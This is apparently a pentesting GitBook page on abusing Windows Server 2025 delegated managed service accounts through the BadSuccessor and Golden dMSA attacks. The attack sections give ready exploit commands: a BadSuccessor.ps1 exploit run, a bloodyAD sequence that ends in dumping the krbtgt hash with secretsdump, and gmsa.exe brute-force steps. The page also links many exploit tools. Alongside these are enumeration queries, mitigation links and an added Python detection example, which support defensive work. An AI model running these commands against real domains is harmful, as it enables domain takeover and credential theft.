# dMSA - Windows Server 2025

[![ko-fi](https://ko-fi.com/img/githubbutton_sm.svg)](https://ko-fi.com/Y8Y41FQ2GA)

Delegated Managed Service Accounts (dMSAs) are a new feature introduced in **Windows Server 2025**.

dMSAs are designed to streamline the management of service accounts by allowing a new dMSA to *inherit* permissions from an older account it replaces.

## BadSuccessor

{% hint style="info" %}
*Target domain must have at least one **Windows Server 2025 Domain Controller***
{% endhint %}

Attackers can simulate this migration by modifying just two attributes on a dMSA object: `msDS-ManagedAccountPrecededByLink` and `msDS-DelegatedMSAState`. Setting the first to reference a target user and the second to `2` (indicating migration completion) tricks the system into believing a legitimate migration occurred.

The dMSA then automatically gains all the permissions of the targeted user, including those of highly privileged accounts such as Domain Admins. Crucially, the attack requires no permissions on the targeted user's account itself, only the ability to create or control a dMSA.

{% embed url="<https://www.akamai.com/blog/security-research/abusing-dmsa-for-privilege-escalation-in-active-directory>" %}
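Detection logic for the two-attribute pattern described above, as an added example (not code from this page or from any of the tools it links): it walks simplified object-created (5137) and object-modified (5136) audit records, which are an assumed normalisation of the Windows Security log, and reports any dMSA whose `msDS-ManagedAccountPrecededByLink` and `msDS-DelegatedMSAState` = 2 were set by someone outside an approved operator list. Names, DNs and the sample records are constructed placeholders.

```python
# Added example, not from the original page: flag the BadSuccessor attribute pattern in
# normalised Directory Service audit records. The flat record layout is an assumed simplification
# of Windows Security events 5137 (object created) and 5136 (object modified); samples are constructed.
from collections import defaultdict

DMSA_CLASS = "msDS-DelegatedManagedServiceAccount"
LINK_ATTR = "msDS-ManagedAccountPrecededByLink"
STATE_ATTR = "msDS-DelegatedMSAState"
MIGRATION_DONE = "2"  # value that marks the migration as complete

def ev(event_id, object_dn, subject, attribute=None, value=None):
    return {"event_id": event_id, "object_class": DMSA_CLASS, "object_dn": object_dn,
            "subject": subject, "attribute": attribute, "value": value}

def find_bad_successor(events, allowed_subjects=frozenset()):
    """Return one alert per dMSA whose predecessor link and migration state were
    both set, unless every actor who touched it is an approved operator."""
    facts = defaultdict(lambda: {"actors": set()})  # object_dn -> collected facts
    for e in events:
        if e.get("object_class") != DMSA_CLASS:
            continue
        f = facts[e["object_dn"]]
        if e["event_id"] == 5137:
            f["actors"].add(e["subject"])
        elif e["event_id"] == 5136 and e["attribute"] in (LINK_ATTR, STATE_ATTR):
            f[e["attribute"]] = e["value"]
            f["actors"].add(e["subject"])
    alerts = []
    for dn, f in facts.items():
        if LINK_ATTR not in f or f.get(STATE_ATTR) != MIGRATION_DONE:
            continue  # inheritance only triggers when both attributes are set
        if f["actors"] - set(allowed_subjects):
            alerts.append({"dmsa": dn, "target": f[LINK_ATTR], "actors": sorted(f["actors"])})
    return alerts

# Constructed sample records with placeholder names in a fictitious EXAMPLE domain.
SUS = "CN=sus_dMSA,OU=Staff,DC=example,DC=local"
OK = "CN=web_dMSA,OU=Services,DC=example,DC=local"
SAMPLE_EVENTS = [
    ev(5137, SUS, "EXAMPLE\\j.taylor"),
    ev(5136, SUS, "EXAMPLE\\j.taylor", LINK_ATTR, "CN=Administrator,CN=Users,DC=example,DC=local"),
    ev(5136, SUS, "EXAMPLE\\j.taylor", STATE_ATTR, "2"),
    ev(5137, OK, "EXAMPLE\\svc.admin"),  # sanctioned migration by an approved operator
    ev(5136, OK, "EXAMPLE\\svc.admin", LINK_ATTR, "CN=svc_web,OU=Services,DC=example,DC=local"),
    ev(5136, OK, "EXAMPLE\\svc.admin", STATE_ATTR, "2"),
]

if __name__ == "__main__":
    for alert in find_bad_successor(SAMPLE_EVENTS, {"EXAMPLE\\svc.admin"}):
        print(alert)
```

Without an allow-list every completed dMSA migration is reported, which is the safer default when the change-control process is not yet known.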

## Detection

Attack prerequisites: at least one Windows Server 2025 DC and CreateChild permission on any OU.

### Windows Server 2025

Verify whether any domain controller runs Windows Server 2025.

#### LDAPSearch

```
ldapsearch "(&(objectClass=computer)(primaryGroupID=516))" dn,name,operatingsystem
```

#### BloodHound Cypher Query

```
MATCH (c1:Computer)-[:MemberOf*1..]->(g:Group)
WHERE g.objectsid ENDS WITH '-516'
WITH COLLECT(c1.name) AS dcs
MATCH (c2:Computer)
WHERE c2.enabled = true AND c2.operatingsystem CONTAINS '2025' AND c2.name IN dcs
RETURN c2.name
```

<https://x.com/badsectorlabs/status/1925229491607023702>

```
MATCH (c:Computer)
WHERE c.isdc = true AND c.operatingsystem CONTAINS "2025"
RETURN c.name
```

### CreateChild permission on any OU

#### BloodHound

```
MATCH (u:User {name: "USERNAME@DOMAIN.LOCAL"})-[r]->(ou:OU)
RETURN type(r) AS edge_type, r.rightname AS permission, ou.name AS organizational_unit
```

#### PowerView

```
# Resolve the principal's SID first, then keep only CreateChild ACEs that belong to it
$sid = ConvertTo-SID -ObjectName 'DOMAIN\username'
Get-DomainObjectAcl -Identity "OU=GroupName,DC=DOMAIN,DC=local" -ResolveGUIDs |
    Where-Object { $_.ActiveDirectoryRights -match 'CreateChild' -and $_.SecurityIdentifier -eq $sid }
```

### BadSuccessor.ps1

{% embed url="<https://github.com/LuemmelSec/Pentest-Tools-Collection/blob/main/tools/ActiveDirectory/BadSuccessor.ps1>" %}

```
BadSuccessor -mode check -Domain evilcorp.local
```

<figure><img src="/files/Uep4aXquYGp4R2dwx5wG" alt=""><figcaption></figcaption></figure>

```
BadSuccessor -mode exploit -Path "CN=Users,DC=otrf,DC=local" -Name "sus_dMSA" -DelegatedAdmin "j.taylor" -DelegateTarget "svcAccount06" -domain "otrf.local"
```

### BadSuccessor

Identify **which identities have permissions** to create dMSAs in the domain, and **which OUs are affected**, highlighting where the BadSuccessor attack could be executed.

{% embed url="<https://github.com/akamai/BadSuccessor>" %}

## Proof of Concept (PoC)

### NetExec

```
nxc ldap [IP] -u administrator -p password -M badsuccessor
```

<figure><img src="/files/j255CMcrLoWVs9LgChBH" alt=""><figcaption></figcaption></figure>

<https://x.com/mpgn_x64/status/1925935365744951350>

### Rubeus

{% embed url="<https://github.com/GhostPack/Rubeus/pull/194>" %}

### SharpSuccessor - .NET

{% embed url="<https://github.com/logangoins/SharpSuccessor>" %}

### BadSuccessor - PowerShell

{% embed url="<https://github.com/LuemmelSec/Pentest-Tools-Collection/blob/main/tools/ActiveDirectory/BadSuccessor.ps1>" %}

### PowerView.py dev branch - Python

{% embed url="<https://github.com/aniqfakhrul/powerview.py/tree/dev>" %}

<figure><img src="/files/0km8oZ1C0vh9ODsdBkUM" alt=""><figcaption></figcaption></figure>

{% embed url="<https://medium.com/seercurity-spotlight/operationalizing-the-badsuccessor-abusing-dmsa-for-domain-privilege-escalation-429cefc36187>" %}

### BadSuccessor - Python

{% embed url="<https://github.com/cybrly/badsuccessor>" %}

### BloodyAD - Python

{% embed url="<https://github.com/CravateRouge/bloodyAD/releases/tag/v2.1.14>" %}

```
$ python bloodyAD.py --host 192.168.100.5 -d bloody.corp -u jeanne -p 'Password123!' get writable --otype OU --right CHILD
$ python bloodyAD.py --host 192.168.100.5 -d bloody.corp -u jeanne -p 'Password123!' get writable --otype OU
$ python bloodyAD.py --host 192.168.100.5 -d bloody.corp -u jeanne -p 'Password123!' add badSuccessor dmsADM10
$ export KRB5CCNAME=dmsADM10_wT.ccache
$ secretsdump.py 'bloody.corp/dmsADM10$@DC2025.bloody.corp' -k -no-pass -just-dc -user bloody\\krbtgt -dc-ip 192.168.100.5 -target-ip 192.168.100.5
```

## Mitigation

{% embed url="<https://specterops.io/blog/2025/05/27/understanding-mitigating-badsuccessor/>" %}

{% embed url="<https://academy.bluraven.io/blog/detecting-badsuccessor>" %}

* Set three deny ACEs on OUs to prevent dMSA abuse.

{% embed url="<https://github.com/JimSycurity/dMSAs>" %}

* Disable implicit owner rights (KB5008383).

{% embed url="<https://support.microsoft.com/en-us/topic/kb5008383-active-directory-permissions-updates-cve-2021-42291-536d5555-ffba-4248-a60e-d6cbc849cde1>" %}

* Avoid having a KDS Root Key; check whether one exists with `Get-KdsRootKey`.

{% embed url="<https://learn.microsoft.com/en-us/powershell/module/kds/get-kdsrootkey?view=windowsserver2025-ps>" %}

## Golden dMSA

{% embed url="<https://www.semperis.com/blog/golden-dmsa-what-is-dmsa-authentication-bypass/>" %}

The Golden dMSA attack enables attackers to **bypass authentication and generate passwords** for all dMSAs and gMSAs and their associated service accounts.

{% embed url="<https://github.com/Semperis/GoldenGMSA>" %}

Obtain dMSAs with `gmsa.exe` run from the `root.test` domain:

```
gmsa.exe kds --domain child.root.test
```

<figure><img src="/files/0Xh5UdRxyyVzxrPpknF0" alt=""><figcaption></figcaption></figure>

```
gmsa.exe info -u weak -p password -d root.test -o child.root.test
```

<figure><img src="/files/XeUyt8CpMKtNZvxoof3C" alt=""><figcaption></figcaption></figure>

Create a wordlist for the `managedPasswordId` brute-force attack:

```
gmsa.exe wordlist -s "SID" -d root.test -f root.test -k "output"
```

<figure><img src="/files/Fgj4cIe9dZ24CDnVkJCv" alt=""><figcaption></figcaption></figure>

Brute-force:

```
gmsa.exe bruteforce -s "domain_SID" -d root.test -i "output" -u dmsa$ -k "base64_blob"
```

<figure><img src="/files/gLrizGccZi136t41zahi" alt=""><figcaption></figcaption></figure>

## Interesting Book

{% content-ref url="/pages/VVT5FQq9z62bWoNAWCUS" %}
[Interesting Books](/0xss0rz/interesting-books.md)
{% endcontent-ref %}

{% hint style="info" %}
***Disclaimer**: As an Amazon Associate, I earn from qualifying purchases. This helps support this GitBook project at no extra cost to you.*
{% endhint %}

* [**Pentesting Active Directory and Windows-based Infrastructure**](https://www.amazon.fr/dp/1804611360?tag=0xss0rz-21)\
  Enhance your skill set to pentest against real-world Microsoft infrastructure with hands-on exercises and by following attack/detect guidelines with OpSec considerations
* [**Infrastructure Attack Strategies for Ethical Hacking**](https://www.amazon.fr/dp/8196994729?tag=0xss0rz-21)\
  Encompassing both external and internal enumeration techniques, the book delves into attacking routers and services, establishing footholds, privilege escalation, lateral movement, and exploiting databases and Active Directory.
* [**RTFM: Red Team Field Manual v2**](https://www.amazon.fr/dp/1075091837?tag=0xss0rz-21)\
  A quick reference when there is no time to scour the Internet for that perfect command
* [**Red Team Development and Operations: A practical guide**](https://www.amazon.fr/dp/B0842BMMCC?tag=0xss0rz-21)\
  The authors have moved beyond SANS training and use this book to detail red team operations in a practical guide.
* [**Cybersecurity Attacks – Red Team Strategies**](https://www.amazon.fr/dp/B0822G9PTM?tag=0xss0rz-21)\
  A practical guide to building a penetration testing program having homefield advantage

## Support this Gitbook

I hope it helps you as much as it has helped me. If you can support me in any way, I would deeply appreciate it.

[![ko-fi](https://ko-fi.com/img/githubbutton_sm.svg)](https://ko-fi.com/Y8Y41FQ2GA)

[![buymeacoffee](https://cdn.buymeacoffee.com/buttons/v2/default-yellow.png)](https://buymeacoffee.com/0xss0rz)
